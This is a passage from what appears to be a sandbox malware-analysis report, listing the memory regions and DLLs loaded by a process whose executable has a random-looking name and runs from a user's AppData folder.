957 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 958 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 959 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 960 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 961 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 962 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 963 start_va = 0x7d0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 964 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 965 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 966 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 967 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 968 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 969 start_va = 0x7e0000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 970 start_va = 0x6c430000 end_va = 0x6c4acfff monitored = 1 entry_point = 0x6c440db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 971 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 972 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 973 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 974 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 975 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 976 start_va = 0x940000 end_va = 0xac7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 977 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 978 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 979 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 980 start_va = 0xad0000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 981 start_va = 0xc60000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 982 start_va = 0x1e0000 end_va = 0x1e2fff monitored = 1 entry_point = 0x1e37de region_type = mapped_file name = "jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") Region: id = 983 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 984 start_va = 0x6f840000 end_va = 0x6f847fff monitored = 0 entry_point = 0x6f8417b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 985 start_va = 0x69370000 end_va = 0x69a50fff monitored = 1 entry_point = 0x6939cd70 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 986 start_va = 0x6a880000 end_va = 0x6a974fff monitored = 0 entry_point = 0x6a8d4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 987 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 988 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 989 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 990 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 991 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 992 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 993 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 994 start_va = 0x770000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 995 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 996 start_va = 0x7e0000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 997 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 998 start_va = 0x2060000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 999 start_va = 0x790000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1000 start_va = 0x2160000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1001 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 1002 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1003 start_va = 0x2260000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 1004 start_va = 0x880000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1005 start_va = 0x7e0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 1006 start_va = 0x4260000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 1007 start_va = 0x4360000 end_va = 0x4696fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1008 start_va = 0x680b0000 end_va = 0x69361fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll") Region: id = 1009 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1010 start_va = 0x2060000 end_va = 0x20f0fff monitored = 0 entry_point = 0x2098cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1011 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1012 start_va = 0x73dd0000 end_va = 0x73e44fff monitored = 0 entry_point = 0x73e09a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1013 start_va = 0x2060000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1014 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1015 start_va = 0x69e40000 end_va = 0x69ebffff monitored = 1 entry_point = 0x69e41180 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 1016 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1017 start_va = 0x830000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1032 start_va = 0x676e0000 end_va = 0x680abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll") Region: id = 1042 start_va = 0x69c40000 end_va = 0x69dcefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll") Region: id = 1043 start_va = 0x66a70000 end_va = 0x676d6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll") Region: id = 1044 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1045 start_va = 0x840000 end_va = 0x841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1063 start_va = 0x2060000 end_va = 0x20eefff monitored = 0 entry_point = 0x206dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1064 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1065 start_va = 0x6b4d0000 end_va = 0x6b561fff monitored = 0 entry_point = 0x6b4ddd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1066 start_va = 0x46a0000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1067 start_va = 0x850000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1068 start_va = 0x2060000 end_va = 0x211bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 1069 start_va = 0x850000 end_va = 0x853fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1070 start_va = 0x860000 end_va = 0x863fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1072 start_va = 0x4820000 end_va = 0x4a2afff monitored = 0 entry_point = 0x48cb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 1077 start_va = 0x72d30000 end_va = 0x72f3efff monitored = 0 entry_point = 0x72ddb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 1078 start_va = 0x920000 end_va = 0x920fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1079 start_va = 0x2120000 end_va = 0x2121fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 1080 start_va = 0x46a0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1081 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 1082 start_va = 0x73db0000 end_va = 0x73dccfff monitored = 0 entry_point = 0x73db3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1105 start_va = 0x46a0000 end_va = 0x46b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 1106 start_va = 0x46f0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 1136 start_va = 0x66320000 end_va = 0x66a40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll") Region: id = 1152 start_va = 0x66220000 end_va = 0x66310fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll") Region: id = 1153 start_va = 0x65b00000 end_va = 0x6621dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll") Region: id = 1154 start_va = 0x920000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 1155 start_va = 0x764d0000 end_va = 0x764d5fff monitored = 0 entry_point = 0x764d1460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1156 start_va = 0x5e430000 end_va = 0x5e4cbfff monitored = 1 entry_point = 0x5e4be9a6 region_type = mapped_file name = "microsoft.visualbasic.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll") Region: id = 1157 start_va = 0x4700000 end_va = 0x479bfff monitored = 1 entry_point = 0x478e9a6 region_type = mapped_file name = "microsoft.visualbasic.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll") Region: id = 1190 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1193 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1194 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1195 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1196 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1197 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1198 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1199 start_va = 0x65a50000 end_va = 0x65af4fff monitored = 0 entry_point = 0x65a6ac50 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1200 start_va = 0x65a20000 end_va = 0x65a42fff monitored = 0 entry_point = 0x65a25570 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1201 start_va = 0x65a10000 end_va = 0x65a1ffff monitored = 0 entry_point = 0x65a13820 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1202 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1203 start_va = 0x71400000 end_va = 0x7144efff monitored = 0 entry_point = 0x7140d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1204 start_va = 0x4820000 end_va = 0x48fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1205 start_va = 0x47a0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 1206 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1207 start_va = 0x71450000 end_va = 0x714eafff monitored = 0 entry_point = 0x7148f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1208 start_va = 0x4a00000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1209 start_va = 0x4a40000 end_va = 0x4b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 1210 start_va = 0x71520000 end_va = 0x71531fff monitored = 0 entry_point = 0x71524510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1211 start_va = 0x714f0000 end_va = 0x7151efff monitored = 0 entry_point = 0x714fbb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1212 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1213 start_va = 0x6a860000 end_va = 0x6a872fff monitored = 0 entry_point = 0x6a8625d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1214 start_va = 0x6a840000 end_va = 0x6a853fff monitored = 0 entry_point = 0x6a843c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1215 start_va = 0x4b40000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 1216 start_va = 0x4b80000 end_va = 0x4c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 1217 start_va = 0x4c80000 end_va = 0x4cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 1218 start_va = 0x4cc0000 end_va = 0x4dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 1219 start_va = 0x4dc0000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 1220 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1221 start_va = 0x4f00000 end_va = 0x4f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1222 start_va = 0x4f40000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 1223 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1224 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1225 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1226 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1227 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1228 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1229 start_va = 0x2140000 end_va = 0x2140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 1230 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1231 start_va = 0x46c0000 end_va = 0x46c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1232 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1233 start_va = 0x46c0000 end_va = 0x46c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1234 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") 